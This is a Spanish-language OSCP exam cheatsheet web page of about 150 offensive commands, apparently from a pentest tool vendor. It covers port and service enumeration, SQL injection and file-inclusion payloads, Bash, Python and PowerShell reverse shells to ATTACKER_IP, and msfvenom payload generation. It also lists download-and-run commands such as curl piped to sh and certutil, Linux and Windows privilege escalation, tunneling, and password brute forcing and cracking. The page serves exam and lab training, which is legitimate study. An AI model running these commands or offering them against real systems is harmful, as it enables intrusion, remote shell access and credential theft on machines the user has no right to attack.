Cheatsheet OSCP 2026

150+ comandos esenciales organizados por fase del examen OSCP. Desde la enumeración inicial hasta la escalada de privilegios, Active Directory, pivoting y redacción de informes — todo lo que necesitas para aprobar.

Última actualización:

Navegación rápida

01 Enumeración 02 Explotación Web 03 Shells y Payloads 04 Privesc Linux 05 Privesc Windows 06 Active Directory 07 Pivoting y Tunneling 08 Ataques de contraseñas 09 Transferencia de archivos 10 Consejos para el examen

# Enumeración

La enumeración lo es todo en el OSCP. Dedica el 80% de tu tiempo aquí. Escanea todos los puertos, enumera todos los servicios.

Nmap — Estrategia de escaneo completo

nmap -p- --min-rate=1000 -T4 TARGET_IP -oN ports.txt
Paso 1: Escaneo rápido de todos los puertos TCP para descubrir puertos abiertos
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET_IP
Paso 2: Escaneo dirigido con scripts + detección de versión en los puertos descubiertos
nmap -sU --top-ports 200 --min-rate=1000 TARGET_IP
¡No olvides UDP! Escanea los 200 puertos UDP más comunes

Enumeración Web

feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak -t 50
Fuerza bruta de directorios con extensiones comunes (php, txt, bak son oro en OSCP)
whatweb http://TARGET && curl -s http://TARGET -I
Identificar tecnologías web y cabeceras del servidor
nikto -h http://TARGET -C all
Escáner de vulnerabilidades web — encuentra misconfiguraciones y archivos por defecto

Enumeración SMB

smbclient -N -L //TARGET
Listar recursos compartidos SMB con sesión nula (sin contraseña)
enum4linux-ng -A TARGET
Enumeración completa SMB/RPC — usuarios, recursos, grupos, política de contraseñas
crackmapexec smb TARGET -u '' -p '' --shares
Enumerar recursos compartidos legibles con CrackMapExec

SNMP, LDAP, DNS

snmpwalk -v2c -c public TARGET 1.3.6.1.2.1
SNMP walk con community string "public" — puede filtrar nombres de usuario, procesos
ldapsearch -H ldap://TARGET -x -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName
Consulta LDAP anónima para enumerar usuarios del dominio
dig axfr @TARGET DOMAIN.LOCAL
Intento de transferencia de zona DNS

# Explotación Web

Inyección SQL, bypass de upload, inyección de comandos — lo fundamental de las boxes web OSCP.

Inyección SQL

sqlmap -u "http://TARGET/page?id=1" --batch --dbs
Detección automática de SQLi — enumerar bases de datos
sqlmap -r request.txt --batch --level 5 --risk 3 --os-shell
SQLi desde petición Burp — obtener un shell del SO si es posible

Bypass de subida de archivos

cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
Bypass de doble extensión — subir como .php.jpg

Inyección de comandos

; whoami
Prueba básica de inyección de comando (prueba también | whoami, `whoami`, $(whoami))

Inclusión de archivos (LFI/RFI)

curl "http://TARGET/page?file=../../../etc/passwd"
LFI — leer /etc/passwd mediante path traversal
curl "http://TARGET/page?file=php://filter/convert.base64-encode/resource=config.php"
Wrapper PHP filter — leer código fuente como base64

# Shells y Payloads

Reverse shells, bind shells y generación de payloads — apréndetelos de memoria para el examen.

Reverse Shells

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Reverse shell Bash — el clásico
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Reverse shell Python3
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
Reverse shell PowerShell — para objetivos Windows

Mejora del shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
Paso 1: Generar un shell PTY
export TERM=xterm && stty raw -echo; fg
Paso 2: TTY interactivo completo (Ctrl+Z primero, luego ejecuta esto)

Payloads Msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
EXE reverse shell Windows x64
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
Binario ELF reverse shell Linux x64

# Escalada de privilegios Linux

El OSCP ama el privesc Linux. Comprueba SUID, capabilities, cron jobs, rutas escribibles, versión del kernel.

💡 Consejo OSCP: Siempre ejecuta LinPEAS primero. Luego verifica manualmente los hallazgos.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Ejecutar LinPEAS directamente — resalta vectores de privesc en color
find / -perm -4000 -type f 2>/dev/null
Encontrar todos los binarios SUID — verifica cada uno en GTFOBins
sudo -l
Verificar qué puedes ejecutar como root — el vector de privesc #1
getcap -r / 2>/dev/null
Encontrar binarios con capabilities (cap_setuid = root instantáneo)
cat /etc/crontab && ls -la /etc/cron*
Verificar cron jobs — ¿scripts escribibles ejecutándose como root?
find / -writable -type f 2>/dev/null | grep -v proc
Encontrar archivos escribibles por todos — potencial de path hijacking
uname -a && cat /etc/os-release
Verificar versión del kernel — buscar exploits de kernel

# Escalada de privilegios Windows

Servicios, tokens, AlwaysInstallElevated, rutas de servicios sin comillas, potatoes — los clásicos OSCP.

💡 Consejo OSCP: Ejecuta WinPEAS + PowerUp.ps1 — juntos detectan la mayoría de vectores.
.\winPEASx64.exe
WinPEAS — verificación automatizada de escalada de privilegios Windows
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
PowerUp — encuentra misconfiguraciones, permisos débiles, rutas sin comillas
whoami /priv
Verificar privilegios del token actual — ¿SeImpersonate? ¿SeBackup?
.\GodPotato.exe -cmd "cmd /c whoami"
GodPotato — SYSTEM instantáneo desde SeImpersonatePrivilege (funciona en Windows modernos)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Verificar AlwaysInstallElevated — si es 1, genera payload MSI para SYSTEM
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"
Encontrar rutas de servicios sin comillas — potencial de hijacking de binario

# Pivoting y Tunneling

Alcanzar redes internas a través de hosts comprometidos. Chisel, túneles SSH, ligolo — imprescindible para OSCP.

Chisel (Recomendado)

./chisel server -p 8080 --reverse
En tu Kali: iniciar servidor Chisel en modo reverse
./chisel client ATTACKER_IP:8080 R:socks
En el objetivo: conexión de vuelta, crea proxy SOCKS5 en puerto 1080 de Kali
proxychains4 nmap -sT -Pn -p 445,3389,5985 INTERNAL_IP
Escanear red interna a través del proxy SOCKS

Túneles SSH

ssh -L 8080:INTERNAL_IP:80 user@PIVOT_IP
Port forward local — acceder al web interno en localhost:8080
ssh -D 1080 user@PIVOT_IP
Proxy SOCKS dinámico por SSH — usar con proxychains

# Ataques de contraseñas

Crackear hashes, fuerza bruta de logins — hashcat y John son tus mejores aliados.

hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
Crackear hashes Kerberoast (TGS-REP tipo 23)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
Crackear hashes AS-REP roast
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
John the Ripper — detecta automáticamente el tipo de hash y crackea
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
Fuerza bruta de login web con Hydra

# Transferencia de archivos

Llevar herramientas al objetivo y exfiltrar datos. Múltiples métodos para diferentes situaciones.

Objetivos Linux

python3 -m http.server 8000
En Kali: iniciar servidor HTTP para servir archivos
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
En el objetivo: descargar y dar permisos de ejecución

Objetivos Windows

certutil -urlcache -split -f http://ATTACKER_IP:8000/shell.exe C:\Windows\Temp\shell.exe
Descarga con Certutil — funciona en la mayoría de versiones de Windows
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','C:\Windows\Temp\shell.exe')"
Descarga PowerShell — alternativa a certutil

# Consejos para el examen OSCP

Estrategia y mentalidad para las 23h45 de examen. Estos consejos vienen de cientos de experiencias OSCP.

⏱️ Gestión del tiempo: No pases más de 2 horas en una sola máquina. Si estás atascado, pasa a otra y vuelve después con ojos frescos.
📝 Documenta todo: Haz capturas de pantalla en cada paso. No dejes el informe para el final — pega las evidencias en tu plantilla durante el examen.
🎯 Empieza por las boxes fáciles: Las máquinas standalone (no-AD) suelen ser más rápidas de rootear. Asegura esos puntos primero.
🔁 Enumera más profundamente: Si estás atascado, no has enumerado lo suficiente. Relanza escaneos con otras wordlists, revisa todos los puertos, mira el código fuente.
🏠 Set AD = 40 puntos: La cadena AD es el bloque de puntos más grande. Practica con boxes AD en HackTheBox y TryHackMe antes del examen.
💤 Toma descansos: Duerme 2-4 horas durante el examen. Volver descansado suele llevar a resolver lo que te tenía atascado.

❓ Preguntas frecuentes sobre el OSCP

El examen OSCP es un examen práctico de 23h45. Incluye una cadena de Active Directory de 40 puntos y 3 máquinas independientes de 20 puntos cada una. Necesitas 70 puntos para aprobar. Es obligatorio un informe profesional entregado dentro de las 24 horas posteriores al examen.

La mayoría de herramientas de pentest comunes están permitidas: nmap, Burp Suite, sqlmap, Metasploit (limitado a una máquina), linpeas, winpeas, crackmapexec, impacket, BloodHound. La asistencia con IA está prohibida. La lista completa está en la guía de examen de OffSec.

La enumeración. El consenso de la comunidad OSCP es: si estás atascado, no has enumerado lo suficiente. Escanea los 65535 puertos TCP, revisa UDP, enumera cada servicio encontrado y lee el código fuente con atención.

La mayoría de los candidatos necesitan de 3 a 6 meses de práctica dedicada en plataformas como HackTheBox, TryHackMe y los labs OffSec PG Practice. La experiencia previa en Linux y redes reduce significativamente el tiempo de preparación.

El Kerberoasting es un ataque de Active Directory que solicita tickets de servicio para cuentas con SPN y los crackea offline. Usa impacket-GetUserSPNs para extraer los hashes y hashcat (-m 13100) para crackearlos con rockyou.txt.

En Linux: configuraciones sudo incorrectas, binarios SUID, abuso de tareas cron, rutas escribibles en PATH. En Windows: SeImpersonatePrivilege (Potatoes), rutas de servicio sin comillas, AlwaysInstallElevated, DLL hijacking. Ejecuta siempre LinPEAS/WinPEAS primero.

Sí, pero solo en una máquina durante todo el examen (incluido meterpreter). Elige con cuidado — resérvalo para una máquina donde la explotación manual llevaría demasiado tiempo.

OSCP+ es el itinerario de certificación actualizado de OffSec con módulos adicionales sobre ataques a Active Directory, pivoting avanzado y desarrollo de exploits. El formato del examen práctico de 23h45 es el mismo, pero los candidatos a OSCP+ necesitan habilidades de AD más sólidas para completar la cadena.

Pass-the-Hash usa un hash NTLM para autenticarse sin conocer la contraseña en texto plano. Usa impacket-psexec DOMAIN/user@TARGET -hashes :NTLM_HASH o evil-winrm -i TARGET -u user -H NTLM_HASH. Solo funciona contra autenticación NTLM, no Kerberos.

El patrón BOF de OSCP: 1) fuzzear para encontrar el crash, 2) hallar el offset exacto de EIP con msf-pattern_create/offset, 3) identificar los bad characters, 4) encontrar un gadget JMP ESP con !mona jmp -r esp, 5) generar el shellcode con msfvenom -p windows/shell_reverse_tcp -b BADCHARS -f python. Practica en la room Buffer Overflow Prep de TryHackMe.

📚 Recursos Relacionados

Informe de pentest asistido por IA

Transforma tus hallazgos en un informe PDF profesional. La IA rellena CVE, CVSS y severidad automáticamente.

Probar gratis →

¿Quieres los 12.020+ comandos?

Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías con búsqueda instantánea y copia en un clic.

Crear una cuenta gratis →
📎 ¿Te resulta útil esta cheatsheet?